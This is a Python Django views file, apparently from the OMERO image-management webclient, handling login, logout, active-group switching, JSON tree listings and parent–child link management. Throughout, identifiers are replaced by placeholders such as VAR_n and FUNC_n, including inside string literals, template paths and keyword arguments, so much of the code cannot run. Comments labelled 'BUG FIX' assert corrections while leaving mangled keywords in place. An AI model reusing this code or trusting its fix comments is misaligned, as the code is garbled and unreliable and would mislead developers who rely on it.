            VAR_339 = VAR_2.GET.get("server", VAR_2.POST.get("server"))
            if VAR_339 is not None:
                VAR_115 = {"server": unicode(VAR_339)}
                # BUG FIX: 'initial' was an undefined name; the form's
                # initial data is the dict built just above.
                VAR_22 = LoginForm(VAR_115=VAR_115)
            else:
                VAR_22 = LoginForm()
        VAR_53 = {
            "version": omero_version,
            "build_year": build_year,
            "error": VAR_57,
            "form": VAR_22,
        }
        VAR_5 = VAR_2.GET.get("url")
        if VAR_5 is not None and len(VAR_5) != 0:
            VAR_53["url"] = urlencode({"url": VAR_5})
        if hasattr(settings, "LOGIN_LOGO"):
            VAR_53["LOGIN_LOGO"] = settings.LOGIN_LOGO
        if settings.PUBLIC_ENABLED:
            VAR_340 = VAR_352("webindex")
            if settings.PUBLIC_URL_FILTER.search(VAR_340):
                VAR_53["public_enabled"] = True
                VAR_53["public_login_redirect"] = VAR_340
        VAR_53["show_download_links"] = settings.SHOW_CLIENT_DOWNLOADS
        if settings.SHOW_CLIENT_DOWNLOADS:
            # BUG FIX: r"\VAR_364+" is an invalid regex escape (re.error);
            # the pattern splits the OMERO version into numeric parts (\d+).
            VAR_341 = re.match(
                (
                    r"(?P<major>\d+)\."
                    r"(?P<minor>\d+)\."
                    r"(?P<patch>\d+\.?)?"
                    r"(?P<dev>(dev|a|b|rc)\d+)?.*"
                ),
                omero_version,
            )
            # NOTE(review): 'VAR_416' inside this literal looks like a mangled
            # token (likely a leading 'v' tag prefix) — confirm before release.
            VAR_342 = "^VAR_416%s\\.%s\\.[^-]+$" % (
                VAR_341.group("major"),
                VAR_341.group("minor"),
            )
            VAR_53["client_download_tag_re"] = VAR_342
            VAR_53["client_download_repo"] = settings.CLIENT_DOWNLOAD_GITHUB_REPO
        # BUG FIX: 'self.template' is not defined on this class; the template
        # path attribute is VAR_54.
        return render(VAR_2, self.VAR_54, VAR_53)
@login_required(ignore_login_fail=True)
def FUNC_6(VAR_2, VAR_6=None, **VAR_7):
    # Lightweight keep-alive ping; login failures are ignored by the decorator.
    return HttpResponse("OK")
@login_required()
def FUNC_7(VAR_2, VAR_6=None, VAR_5=None, **VAR_7):
    """Switch the active group (stored in the session) and redirect safely."""
    FUNC_8(VAR_2)
    if VAR_5 is None or VAR_5.startswith(VAR_352("change_active_group")):
        VAR_5 = VAR_352("webindex")
    VAR_5 = FUNC_4(VAR_5)  # reject non-whitelisted redirect targets
    return HttpResponseRedirect(VAR_5)
def FUNC_8(VAR_2, VAR_8=None):
    """Persist the chosen active-group id in the session when it changed.

    VAR_8 may be passed directly or read from the 'active_group' GET param.
    """
    if VAR_8 is None:
        VAR_8 = FUNC_0(VAR_2, "active_group", None)
    if VAR_8 is None:
        return
    VAR_8 = int(VAR_8)
    if (
        "active_group" not in VAR_2.session
        or VAR_8 != VAR_2.session["active_group"]
    ):
        VAR_2.session.modified = True
        VAR_2.session["active_group"] = VAR_8
def FUNC_9(VAR_2, VAR_9="All members"):
    """Build a pseudo-experimenter dict (id -1) meaning 'everyone in group'.

    The display label can be overridden via the server setting
    ui.menu.dropdown.everyone.label; VAR_9 is the fallback label.
    """
    VAR_58 = (
        VAR_2.session.get("server_settings")
        .get("ui", {})
        .get("menu", {})
        .get("dropdown", {})
        .get("everyone", {})
        .get("label", VAR_9)
    )
    return {
        "id": -1,
        "omeName": VAR_58,
        "firstName": VAR_58,
        "lastName": "",
    }
@login_required(login_redirect="webindex")
def FUNC_10(VAR_2, VAR_6=None, **VAR_7):
    """Log out: POST closes the connection and flushes the session, then
    redirects to the login view; GET renders a confirmation form."""
    if VAR_2.method == "POST":
        try:
            try:
                VAR_6.close()
            except Exception:
                VAR_0.error("Exception during FUNC_10.", exc_info=True)
        finally:
            # Always clear the session, even if closing the connection failed.
            VAR_2.session.flush()
        return HttpResponseRedirect(VAR_352(settings.LOGIN_VIEW))
    else:
        VAR_53 = {"url": VAR_352("weblogout"), "submit": "Do you want to log out?"}
        VAR_54 = "webgateway/base/includes/post_form.html"
        return render(VAR_2, VAR_54, VAR_53)
def FUNC_11(VAR_2, VAR_10, VAR_6=None, VAR_5=None, **VAR_7):
    """Build the context for a main 'menu' page (VAR_10).

    Resolves any object deep-linked via ?show=..., switches the active group
    if needed, determines the selected experimenter, and assembles groups,
    colleagues and forms for the template.
    """
    VAR_2.session.modified = True
    VAR_54 = VAR_7.get("template", None)
    if VAR_54 is None:
        if VAR_10 == "userdata":
            VAR_54 = "webclient/VAR_158/containers.html"
        elif VAR_10 == "usertags":
            VAR_54 = "webclient/VAR_158/containers.html"
        else:
            # BUG FIX: 'menu' was an undefined name; the path is built from
            # the menu name (VAR_10) twice.
            VAR_54 = "webclient/%s/%s.html" % (VAR_10, VAR_10)
    VAR_59 = VAR_7.get("show", Show(VAR_6, VAR_2, VAR_10))
    try:
        VAR_242 = VAR_59.first_selected
    except IncorrectMenuError as e:
        return HttpResponseRedirect(e.uri)
    VAR_60 = VAR_59.initially_open_owner
    if VAR_2.GET.get("show", None) is not None and VAR_242 is None:
        # A deep link that the public user cannot see: force re-login.
        if (
            settings.PUBLIC_ENABLED
            and settings.PUBLIC_USER == VAR_6.getUser().getOmeName()
        ):
            return HttpResponseRedirect("%s?VAR_5=%s" % (VAR_352("weblogin"), VAR_5))
    if VAR_242 is not None:
        VAR_20 = VAR_242.details.group.id.val
        if VAR_6.isValidGroup(VAR_20):
            FUNC_8(VAR_2, VAR_20)
        else:
            VAR_242 = None
    VAR_61 = {}
    # NOTE(review): keyword 'VAR_158' on this Django form looks like a mangled
    # 'data' kwarg — confirm against the form class.
    VAR_62 = GlobalSearchForm(VAR_158=VAR_2.GET.copy())
    if VAR_10 == "search":
        if VAR_62.is_valid():
            VAR_61["query"] = VAR_62.cleaned_data["search_query"]
    VAR_5 = VAR_7.get("load_template_url", None)
    if VAR_5 is None:
        VAR_5 = VAR_352(viewname="load_template", args=[VAR_10])
    VAR_8 = VAR_2.session.get("active_group") or VAR_6.getEventContext().groupId
    VAR_63, VAR_64 = VAR_6.getObject("ExperimenterGroup", VAR_8).groupSummary()
    VAR_65 = [u.id for u in VAR_63]
    VAR_65.extend([u.id for u in VAR_64])
    VAR_66 = VAR_2.GET.get("experimenter")
    if VAR_60 is not None:
        if VAR_2.session.get("user_id", None) != -1:
            VAR_66 = VAR_60
    try:
        VAR_66 = VAR_241(VAR_66)
    except Exception:
        VAR_66 = None
    if VAR_66 is not None:
        # Drop a requested experimenter who is not in the active group.
        if (
            VAR_66
            not in (
                set(map(lambda x: x.id, VAR_63)) | set(map(lambda x: x.id, VAR_64))
            )
            and VAR_66 != -1
        ):
            VAR_66 = None
    if VAR_66 is None:
        VAR_66 = VAR_2.session.get("user_id", None)
    if VAR_66 is None or int(VAR_66) not in VAR_65:
        if VAR_66 != -1:  # -1 means "all members in group" and is allowed
            VAR_66 = VAR_6.getEventContext().userId
    VAR_2.session["user_id"] = VAR_66
    VAR_67 = list(VAR_6.getGroupsMemberOf())
    # BUG FIX: list.sort() takes the keyword 'key', not 'VAR_312'.
    VAR_67.sort(key=lambda x: x.getName().lower())
    VAR_68 = VAR_67
    VAR_69 = ContainerForm()
    VAR_70 = {}
    if VAR_10 == "search":
        # Colleagues are only needed for the search page.
        for g in VAR_68:
            g.loadLeadersAndMembers()
            for VAR_383 in g.leaders + g.colleagues:
                VAR_70[VAR_383.id] = VAR_383
        VAR_70 = list(VAR_70.values())
        # BUG FIX: same 'key' keyword fix as above.
        VAR_70.sort(key=lambda x: x.getLastName().lower())
    VAR_53 = {
        "menu": VAR_10,
        "init": VAR_61,
        "myGroups": VAR_67,
        "new_container_form": VAR_69,
        "global_search_form": VAR_62,
    }
    VAR_53["groups"] = VAR_68
    VAR_53["myColleagues"] = VAR_70
    VAR_53["active_group"] = VAR_6.getObject("ExperimenterGroup", VAR_241(VAR_8))
    VAR_53["active_user"] = VAR_6.getObject("Experimenter", VAR_241(VAR_66))
    VAR_53["initially_select"] = VAR_59.initially_select
    VAR_53["initially_open"] = VAR_59.initially_open
    VAR_53["isLeader"] = VAR_6.isLeader()
    VAR_53["current_url"] = VAR_5
    VAR_53["page_size"] = settings.PAGE
    VAR_53["template"] = VAR_54
    VAR_53["thumbnails_batch"] = settings.THUMBNAILS_BATCH
    VAR_53["current_admin_privileges"] = VAR_6.getCurrentAdminPrivileges()
    VAR_53["leader_of_groups"] = VAR_6.getEventContext().leaderOfGroups
    VAR_53["member_of_groups"] = VAR_6.getEventContext().memberOfGroups
    VAR_53["search_default_user"] = settings.SEARCH_DEFAULT_USER
    VAR_53["search_default_group"] = settings.SEARCH_DEFAULT_GROUP
    return VAR_53
@login_required()
@render_response()
def FUNC_12(VAR_2, VAR_10, VAR_6=None, VAR_5=None, **VAR_7):
    """Thin view wrapper delegating to FUNC_11 (kept for URL routing)."""
    # BUG FIX: the keyword values referenced undefined names (request, menu,
    # conn, url); forward this view's own arguments (names match FUNC_11's
    # signature, which is defined above).
    return FUNC_11(VAR_2=VAR_2, VAR_10=VAR_10, VAR_6=VAR_6, VAR_5=VAR_5, **VAR_7)
@login_required()
@render_response()
def FUNC_13(VAR_2, VAR_5=None, VAR_6=None, **VAR_7):
    """Render the group/user dropdown: the user's own groups (or, for admins,
    all groups minus the system user/guest groups), with leaders and members
    loaded for display."""
    VAR_67 = list(VAR_6.getGroupsMemberOf())
    # BUG FIX: list.sort() takes the keyword 'key', not 'VAR_312'.
    VAR_67.sort(key=lambda x: x.getName().lower())
    if VAR_6.isAdmin():  # Admin can see all groups
        VAR_243 = [
            VAR_6.getAdminService().getSecurityRoles().userGroupId,
            VAR_6.getAdminService().getSecurityRoles().guestGroupId,
        ]
        VAR_68 = VAR_6.getObjects("ExperimenterGroup", opts={"load_experimenters": True})
        VAR_68 = [g for g in VAR_68 if g.getId() not in VAR_243]
        VAR_68.sort(key=lambda x: x.getName().lower())
    else:
        VAR_68 = VAR_67
    for g in VAR_68:
        g.loadLeadersAndMembers()  # populate leaders / members for template
    VAR_53 = {
        "template": "webclient/base/includes/FUNC_13.html",
        "current_url": VAR_5,
        "groups": VAR_68,
        "myGroups": VAR_67,
    }
    return VAR_53
@login_required()
def FUNC_14(VAR_2, VAR_6=None, **VAR_7):
    """JSON list of groups, optionally filtered by member, paged."""
    try:
        VAR_87 = FUNC_0(VAR_2, "page", 1)
        VAR_88 = FUNC_0(VAR_2, "limit", settings.PAGE)
        VAR_244 = FUNC_0(VAR_2, "member", -1)
    except ValueError:
        return HttpResponseBadRequest("Invalid parameter value")
    try:
        # BUG FIX: keyword values referenced undefined names (conn, member_id,
        # page, limit); pass this function's own locals instead.
        VAR_68 = tree.marshal_groups(
            VAR_6=VAR_6, VAR_244=VAR_244, VAR_87=VAR_87, VAR_88=VAR_88
        )
    except ApiUsageException as e:
        return HttpResponseBadRequest(e.serverStackTrace)
    except ServerError as e:
        return HttpResponseServerError(e.serverStackTrace)
    except IceException as e:
        return HttpResponseServerError(e.message)
    return JsonResponse({"groups": VAR_68})
@login_required()
def FUNC_15(VAR_2, VAR_11, VAR_6=None, **VAR_7):
    """JSON details for one experimenter; an id < 0 yields the 'everyone'
    pseudo-experimenter."""
    try:
        VAR_11 = VAR_241(VAR_11)
    except ValueError:
        return HttpResponseBadRequest("Invalid VAR_343 id")
    try:
        if VAR_11 < 0:
            VAR_343 = FUNC_9(VAR_2)
        else:
            # BUG FIX: keyword values referenced undefined names (conn,
            # experimenter_id); pass this function's own locals.
            VAR_343 = tree.marshal_experimenter(VAR_6=VAR_6, VAR_11=VAR_11)
        if VAR_343 is None:
            raise Http404("No Experimenter found with ID %s" % VAR_11)
        return JsonResponse({"experimenter": VAR_343})
    except ApiUsageException as e:
        return HttpResponseBadRequest(e.serverStackTrace)
    except ServerError as e:
        return HttpResponseServerError(e.serverStackTrace)
    except IceException as e:
        return HttpResponseServerError(e.message)
@login_required()
def FUNC_16(VAR_2, VAR_6=None, **VAR_7):
    """JSON tree data for one experimenter in one group: projects, datasets,
    screens, plates and (when permitted/enabled) the orphaned-images node."""
    try:
        VAR_87 = FUNC_0(VAR_2, "page", 1)
        VAR_88 = FUNC_0(VAR_2, "limit", settings.PAGE)
        VAR_20 = FUNC_0(VAR_2, "group", -1)
        VAR_11 = FUNC_0(VAR_2, "id", -1)
    except ValueError:
        return HttpResponseBadRequest("Invalid parameter value")
    if not VAR_6.isValidGroup(VAR_20):
        return HttpResponseForbidden("Not a member of Group: %s" % VAR_20)
    VAR_71 = dict()
    try:
        # BUG FIX: the keyword values in all tree.marshal_* calls referenced
        # undefined names (conn, group_id, experimenter_id, page, limit);
        # pass this function's own locals instead.
        VAR_71["projects"] = tree.marshal_projects(
            VAR_6=VAR_6,
            VAR_20=VAR_20,
            VAR_11=VAR_11,
            VAR_87=VAR_87,
            VAR_88=VAR_88,
        )
        VAR_71["datasets"] = tree.marshal_datasets(
            VAR_6=VAR_6,
            VAR_247=True,
            VAR_20=VAR_20,
            VAR_11=VAR_11,
            VAR_87=VAR_87,
            VAR_88=VAR_88,
        )
        VAR_71["screens"] = tree.marshal_screens(
            VAR_6=VAR_6,
            VAR_20=VAR_20,
            VAR_11=VAR_11,
            VAR_87=VAR_87,
            VAR_88=VAR_88,
        )
        VAR_71["plates"] = tree.marshal_plates(
            VAR_6=VAR_6,
            VAR_247=True,
            VAR_20=VAR_20,
            VAR_11=VAR_11,
            VAR_87=VAR_87,
            VAR_88=VAR_88,
        )
        try:
            VAR_344 = VAR_2.session["server_settings"]["ui"]["tree"]["orphans"]
        except Exception:
            VAR_344 = {"enabled": True}
        # Orphaned node visible to admins, group leaders, the user's own
        # tree, or when enabled in the server settings.
        if (
            VAR_6.isAdmin()
            or VAR_6.isLeader(VAR_337=VAR_2.session.get("active_group"))
            or VAR_11 == VAR_6.getUserId()
            or VAR_344.get("enabled", True)
        ):
            VAR_247 = tree.marshal_orphaned(
                VAR_6=VAR_6,
                VAR_20=VAR_20,
                VAR_11=VAR_11,
                VAR_87=VAR_87,
                VAR_88=VAR_88,
            )
            VAR_247["name"] = VAR_344.get("name", "Orphaned Images")
            VAR_71["orphaned"] = VAR_247
    except ApiUsageException as e:
        return HttpResponseBadRequest(e.serverStackTrace)
    except ServerError as e:
        return HttpResponseServerError(e.serverStackTrace)
    except IceException as e:
        return HttpResponseServerError(e.message)
    return JsonResponse(VAR_71)
@login_required()
def FUNC_17(VAR_2, VAR_6=None, **VAR_7):
    """JSON list of datasets in a project, paged."""
    try:
        VAR_87 = FUNC_0(VAR_2, "page", 1)
        VAR_88 = FUNC_0(VAR_2, "limit", settings.PAGE)
        VAR_20 = FUNC_0(VAR_2, "group", -1)
        VAR_245 = FUNC_0(VAR_2, "id", None)
    except ValueError:
        return HttpResponseBadRequest("Invalid parameter value")
    if not VAR_6.isValidGroup(VAR_20):
        return HttpResponseForbidden("Not a member of Group: %s" % VAR_20)
    try:
        # BUG FIX: keyword values referenced undefined names (conn,
        # project_id, group_id, page, limit); pass this function's locals.
        VAR_107 = tree.marshal_datasets(
            VAR_6=VAR_6, VAR_245=VAR_245, VAR_20=VAR_20, VAR_87=VAR_87, VAR_88=VAR_88
        )
    except ApiUsageException as e:
        return HttpResponseBadRequest(e.serverStackTrace)
    except ServerError as e:
        return HttpResponseServerError(e.serverStackTrace)
    except IceException as e:
        return HttpResponseServerError(e.message)
    return JsonResponse({"datasets": VAR_107})
@login_required()
def FUNC_18(VAR_2, VAR_6=None, **VAR_7):
    """JSON list of images in a dataset / share / orphan set, paged, with
    optional pixel-size, thumbnail-version and date columns."""
    try:
        VAR_87 = FUNC_0(VAR_2, "page", 1)
        VAR_88 = FUNC_0(VAR_2, "limit", settings.PAGE)
        VAR_20 = FUNC_0(VAR_2, "group", -1)
        VAR_246 = FUNC_0(VAR_2, "id", None)
        VAR_247 = FUNC_3(VAR_2, "orphaned", False)
        VAR_248 = FUNC_3(VAR_2, "sizeXYZ", False)
        VAR_249 = FUNC_3(VAR_2, "thumbVersion", False)
        VAR_250 = FUNC_3(VAR_2, "date", False)
        VAR_11 = FUNC_0(VAR_2, "experimenter_id", -1)
    except ValueError:
        return HttpResponseBadRequest("Invalid parameter value")
    if not VAR_6.isValidGroup(VAR_20):
        return HttpResponseForbidden("Not a member of Group: %s" % VAR_20)
    VAR_25 = "share_id" in VAR_7 and VAR_241(VAR_7["share_id"]) or None
    try:
        # BUG FIX: keyword values referenced undefined names (conn, orphaned,
        # dataset_id, ...); pass this function's own locals instead.
        VAR_106 = tree.marshal_images(
            VAR_6=VAR_6,
            VAR_247=VAR_247,
            VAR_11=VAR_11,
            VAR_246=VAR_246,
            VAR_25=VAR_25,
            VAR_248=VAR_248,
            VAR_20=VAR_20,
            VAR_87=VAR_87,
            VAR_250=VAR_250,
            VAR_249=VAR_249,
            VAR_88=VAR_88,
        )
    except ApiUsageException as e:
        return HttpResponseBadRequest(e.serverStackTrace)
    except ServerError as e:
        return HttpResponseServerError(e.serverStackTrace)
    except IceException as e:
        return HttpResponseServerError(e.message)
    return JsonResponse({"images": VAR_106})
@login_required()
def FUNC_19(VAR_2, VAR_6=None, **VAR_7):
    """JSON list of plates in a screen, paged."""
    try:
        VAR_87 = FUNC_0(VAR_2, "page", 1)
        VAR_88 = FUNC_0(VAR_2, "limit", settings.PAGE)
        VAR_20 = FUNC_0(VAR_2, "group", -1)
        VAR_251 = FUNC_0(VAR_2, "id", None)
    except ValueError:
        return HttpResponseBadRequest("Invalid parameter value")
    if not VAR_6.isValidGroup(VAR_20):
        return HttpResponseForbidden("Not a member of Group: %s" % VAR_20)
    try:
        # BUG FIX: keyword values referenced undefined names (conn,
        # screen_id, group_id, page, limit); pass this function's locals.
        VAR_110 = tree.marshal_plates(
            VAR_6=VAR_6, VAR_251=VAR_251, VAR_20=VAR_20, VAR_87=VAR_87, VAR_88=VAR_88
        )
    except ApiUsageException as e:
        return HttpResponseBadRequest(e.serverStackTrace)
    except ServerError as e:
        return HttpResponseServerError(e.serverStackTrace)
    except IceException as e:
        return HttpResponseServerError(e.message)
    return JsonResponse({"plates": VAR_110})
@login_required()
def FUNC_20(VAR_2, VAR_6=None, **VAR_7):
    """JSON list of plate acquisitions (runs) in a plate, paged."""
    try:
        VAR_87 = FUNC_0(VAR_2, "page", 1)
        VAR_88 = FUNC_0(VAR_2, "limit", settings.PAGE)
        VAR_252 = FUNC_0(VAR_2, "id", None)
    except ValueError:
        return HttpResponseBadRequest("Invalid parameter value")
    if VAR_252 is None:
        return HttpResponseBadRequest("id (VAR_421) must be specified")
    try:
        # BUG FIX: keyword values referenced undefined names (conn,
        # plate_id, page, limit); pass this function's locals instead.
        VAR_253 = tree.marshal_plate_acquisitions(
            VAR_6=VAR_6, VAR_252=VAR_252, VAR_87=VAR_87, VAR_88=VAR_88
        )
    except ApiUsageException as e:
        return HttpResponseBadRequest(e.serverStackTrace)
    except ServerError as e:
        return HttpResponseServerError(e.serverStackTrace)
    except IceException as e:
        return HttpResponseServerError(e.message)
    return JsonResponse({"acquisitions": VAR_253})
def FUNC_21(VAR_6, VAR_12, VAR_13, VAR_14, VAR_15):
    """Query (link class name, link objects) joining children VAR_15 of type
    VAR_14 to parents of type VAR_12, optionally limited to parent VAR_13.

    Returns None where no link type applies (orphans, experimenter pseudo-
    parents of datasets/plates/tags); raises Http404 for an unknown pairing
    or when a specific parent yields no links.
    """
    if VAR_12 == "orphaned":
        return None
    VAR_72 = None
    if VAR_12 == "experimenter":
        if VAR_14 in ["dataset", "plate", "tag"]:
            return None
    elif VAR_12 == "project":
        if VAR_14 == "dataset":
            VAR_72 = "ProjectDatasetLink"
    elif VAR_12 == "dataset":
        if VAR_14 == "image":
            VAR_72 = "DatasetImageLink"
    elif VAR_12 == "screen":
        if VAR_14 == "plate":
            VAR_72 = "ScreenPlateLink"
    elif VAR_12 == "tagset":
        if VAR_14 == "tag":
            VAR_72 = "AnnotationAnnotationLink"
    if not VAR_72:
        raise Http404("json VAR_158 needs 'parent_type' and 'child_type'")
    VAR_73 = omero.sys.ParametersI()
    VAR_73.addIds(VAR_15)
    VAR_74 = VAR_6.getQueryService()
    # BUG FIX: ParametersI.addIds() registers the id list under the query
    # parameter name 'ids', so the HQL placeholder must be ':ids' (the
    # previous ':VAR_187' could never be bound).
    VAR_75 = (
        """
        from %s olink join fetch olink.child join fetch olink.parent
        where olink.child.id in (:ids)
        """
        % VAR_72
    )
    if VAR_13:
        VAR_73.add("pid", rlong(VAR_13))
        VAR_75 += " and olink.parent.id = :pid"
    VAR_76 = VAR_74.findAllByQuery(VAR_75, VAR_73, VAR_6.SERVICE_OPTS)
    if VAR_13 is not None and len(VAR_76) == 0:
        raise Http404(
            "No VAR_346 found for %s-%s to %s-%s"
            % (VAR_12, VAR_13, VAR_14, VAR_15)
        )
    return VAR_72, VAR_76
def FUNC_22(VAR_12, VAR_13, VAR_14, VAR_16):
    """Build an (unsaved) OMERO link object joining child VAR_16 to parent
    VAR_13 for the given parent/child type pairing.

    Returns the string "orphan" for experimenter->dataset/plate (no link
    needed), a new link object for known pairings, or None otherwise.
    """
    if VAR_12 == "experimenter":
        if VAR_14 == "dataset" or VAR_14 == "plate":
            return "orphan"
    if VAR_12 == "project":
        # Unloaded proxy objects (False) — only ids are needed for the link.
        VAR_254 = ProjectI(VAR_241(VAR_13), False)
        if VAR_14 == "dataset":
            VAR_345 = DatasetI(VAR_241(VAR_16), False)
            VAR_346 = ProjectDatasetLinkI()
            VAR_346.setParent(VAR_254)
            VAR_346.setChild(VAR_345)
            return VAR_346
    elif VAR_12 == "dataset":
        VAR_345 = DatasetI(VAR_241(VAR_13), False)
        if VAR_14 == "image":
            VAR_142 = ImageI(VAR_241(VAR_16), False)
            VAR_346 = DatasetImageLinkI()
            VAR_346.setParent(VAR_345)
            VAR_346.setChild(VAR_142)
            return VAR_346
    elif VAR_12 == "screen":
        VAR_384 = ScreenI(VAR_241(VAR_13), False)
        if VAR_14 == "plate":
            VAR_421 = PlateI(VAR_241(VAR_16), False)
            VAR_346 = ScreenPlateLinkI()
            VAR_346.setParent(VAR_384)
            VAR_346.setChild(VAR_421)
            return VAR_346
    elif VAR_12 == "tagset":
        if VAR_14 == "tag":
            VAR_346 = AnnotationAnnotationLinkI()
            VAR_346.setParent(TagAnnotationI(VAR_241(VAR_13), False))
            VAR_346.setChild(TagAnnotationI(VAR_241(VAR_16), False))
            return VAR_346
    return None
def FUNC_23(VAR_6, VAR_14, VAR_15):
    """Map each object's id to its owner's id for the given type and ids.

    "tag" is looked up as the OMERO "Annotation" type.
    """
    VAR_otype = "Annotation" if VAR_14 == "tag" else VAR_14
    return {
        VAR_obj.id: VAR_obj.details.owner.id.val
        for VAR_obj in VAR_6.getObjects(VAR_otype, VAR_15)
    }
@login_required()
def FUNC_24(VAR_2, VAR_6=None, **VAR_7):
    """Dispatch JSON link-management requests: POST creates links, DELETE
    removes them; anything else gets a 405."""
    if VAR_2.method not in ["POST", "DELETE"]:
        # NOTE(review): the 'VAR_315' kwarg looks like a mangled 'status'
        # keyword for JsonResponse — confirm.
        return JsonResponse(
            {"Error": "Need to POST or DELETE JSON VAR_158 to VAR_230 links"}, VAR_315=405
        )
    try:
        VAR_17 = json.loads(VAR_2.body)
    except TypeError:
        # Fallback for bytes bodies (Python 2 compatibility path).
        VAR_17 = json.loads(bytes_to_native_str(VAR_2.body))
    if VAR_2.method == "POST":
        return FUNC_25(VAR_6, VAR_17)
    elif VAR_2.method == "DELETE":
        return FUNC_26(VAR_6, VAR_17)
def FUNC_25(VAR_6, VAR_17, **VAR_7):
    """Create the parent->child links described by the JSON payload VAR_17.

    Payload shape: {parent_type: {parent_id: {child_type: [child_ids]}}}.
    Returns a JSON dict with a "success" flag.
    """
    VAR_78 = {"success": False}
    VAR_79 = []
    # Admins holding WriteOwned may create links on behalf of the data owner.
    VAR_80 = "WriteOwned" in VAR_6.getCurrentAdminPrivileges()
    VAR_66 = VAR_6.getUserId()
    for VAR_12, VAR_82 in VAR_17.items():
        if VAR_12 in ("orphaned", "experimenter"):
            continue
        for VAR_13, children in VAR_82.items():
            for VAR_14, VAR_15 in children.items():
                VAR_385 = FUNC_23(VAR_6, VAR_14, VAR_15)
                for VAR_16 in VAR_15:
                    VAR_13 = int(VAR_13)
                    VAR_346 = FUNC_22(VAR_12, VAR_13, VAR_14, VAR_16)
                    if VAR_346 and VAR_346 != "orphan":
                        if VAR_80 and VAR_385[VAR_16] != VAR_66:
                            # Keep the child's original owner on the new link.
                            VAR_346.details.owner = ExperimenterI(
                                VAR_385[VAR_16], False
                            )
                        VAR_79.append(VAR_346)
    if len(VAR_79) > 0:
        # NOTE(review): VAR_12/VAR_13 are read here after the loops complete,
        # so only the LAST parent seen sets the group context — confirm this
        # is intended when linking under multiple parents.
        VAR_255 = VAR_12.title()
        if VAR_255 in ["Tagset", "Tag"]:
            VAR_255 = "TagAnnotation"
        try:
            VAR_272 = VAR_6.getQueryService().get(VAR_255, VAR_13, VAR_6.SERVICE_OPTS)
            VAR_6.SERVICE_OPTS.setOmeroGroup(VAR_272.details.group.id.val)
        except omero.ValidationException:
            return JsonResponse(
                {"error": "Object of type %s and ID %s not found" % (VAR_255, VAR_13)},
                VAR_315=404,
            )
        VAR_0.info("api_link: Saving %s links" % len(VAR_79))
        try:
            VAR_6.saveArray(VAR_79)
            VAR_78["success"] = True
        except Exception:
            # Bulk save failed (e.g. one duplicate link); retry one-by-one,
            # best-effort, swallowing individual failures.
            VAR_0.info(
                "api_link: Exception on saveArray with %s links" % len(VAR_79)
            )
            for VAR_346 in VAR_79:
                try:
                    VAR_6.saveObject(VAR_346)
                except Exception:
                    pass
            VAR_78["success"] = True
    return JsonResponse(VAR_78)
def FUNC_26(VAR_6, VAR_17):
    """Delete the parent->child links described by the JSON payload VAR_17,
    then report any links each child still has to OTHER parents (so the
    client can refresh those tree nodes)."""
    VAR_78 = {"success": False}
    for VAR_12, VAR_82 in VAR_17.items():
        if VAR_12 == "orphaned":
            continue
        for VAR_13, children in VAR_82.items():
            for VAR_14, VAR_15 in children.items():
                VAR_386 = FUNC_21(
                    VAR_6, VAR_12, VAR_13, VAR_14, VAR_15
                )
                if VAR_386 is None:
                    continue
                VAR_387, VAR_240 = VAR_386
                VAR_388 = [VAR_71.id.val for VAR_71 in VAR_240]
                VAR_0.info("api_link: Deleting %s links" % len(VAR_388))
                VAR_6.deleteObjects(VAR_387, VAR_388, wait=True)
                # Re-query without a parent filter to find remaining links.
                VAR_387, VAR_389 = FUNC_21(
                    VAR_6, VAR_12, None, VAR_14, VAR_15
                )
                for rl in VAR_389:
                    VAR_361 = rl.parent.id.val
                    VAR_422 = rl.child.id.val
                    if VAR_361 == int(VAR_13):
                        continue  # skip the parent we just unlinked from
                    if VAR_12 not in VAR_78:
                        VAR_78[VAR_12] = {}
                    if VAR_361 not in VAR_78[VAR_12]:
                        VAR_78[VAR_12][VAR_361] = {VAR_14: []}
                    VAR_78[VAR_12][VAR_361][VAR_14].append(VAR_422)
    VAR_78["success"] = True
    return JsonResponse(VAR_78)
@login_required()
def FUNC_27(VAR_2, VAR_6=None, **VAR_7):
    """JSON: all parent links for the child ids in the query string
    (image->dataset, dataset->project, plate->screen)."""
    VAR_81 = {"image": "dataset", "dataset": "project", "plate": "screen"}
    VAR_82 = []
    for VAR_14, VAR_12 in VAR_81.items():
        VAR_187 = VAR_2.GET.getlist(VAR_14)
        if len(VAR_187) == 0:
            continue
        # Each query value may itself be a comma-separated list of ids.
        VAR_15 = []
        for id in VAR_187:
            for VAR_320 in id.split(","):
                VAR_15.append(VAR_320)
        VAR_72, VAR_223 = FUNC_21(
            VAR_6, VAR_12, None, VAR_14, VAR_15
        )
        for VAR_346 in VAR_223:
            VAR_82.append(
                {
                    "id": VAR_346.id.val,
                    "parent": {"type": VAR_12, "id": VAR_346.parent.id.val},
                    "child": {"type": VAR_14, "id": VAR_346.child.id.val},
                }
            )
    return JsonResponse({"data": VAR_82})
@login_required()
def FUNC_28(VAR_2, VAR_6=None, **VAR_7):
    """JSON: hierarchy paths from the tree root down to the object named in
    the query string (used to expand the left-hand tree to a deep link)."""
    try:
        VAR_11 = FUNC_0(VAR_2, "experimenter", None)
        VAR_245 = FUNC_0(VAR_2, "project", None)
        VAR_246 = FUNC_0(VAR_2, "dataset", None)
        VAR_256 = FUNC_0(VAR_2, "image", None)
        VAR_251 = FUNC_0(VAR_2, "screen", None)
        VAR_252 = FUNC_0(VAR_2, "plate", None)
        VAR_257 = FUNC_0(VAR_2, "run", None)
        # "acquisition" is an alias for "run"; it wins when both are given.
        VAR_257 = FUNC_0(VAR_2, "acquisition", VAR_257)
        VAR_258 = VAR_2.GET.get("well", None)
        VAR_259 = FUNC_0(VAR_2, "tag", None)
        VAR_260 = FUNC_0(VAR_2, "tagset", None)
        VAR_261 = FUNC_0(VAR_2, "roi", None)
        VAR_262 = FUNC_0(VAR_2, "shape", None)
        VAR_20 = FUNC_0(VAR_2, "group", None)
        VAR_263 = FUNC_0(VAR_2, "page_size", settings.PAGE)
    except ValueError:
        return HttpResponseBadRequest("Invalid parameter value")
    if VAR_259 is not None or VAR_260 is not None:
        VAR_264 = paths_to_tag(VAR_6, VAR_11, VAR_260, VAR_259)
    else:
        VAR_264 = paths_to_object(
            VAR_6,
            VAR_11,
            VAR_245,
            VAR_246,
            VAR_256,
            VAR_251,
            VAR_252,
            VAR_257,
            VAR_258,
            VAR_20,
            VAR_263,
            VAR_261,
            VAR_262,
        )
    return JsonResponse({"paths": VAR_264})
@login_required()
def FUNC_29(VAR_2, VAR_6=None, **VAR_7):
    # Dispatch tag requests: GET lists tags, DELETE removes them.
    if VAR_2.method == "GET":
        return FUNC_30(VAR_2, VAR_6, **VAR_7)
    elif VAR_2.method == "DELETE":
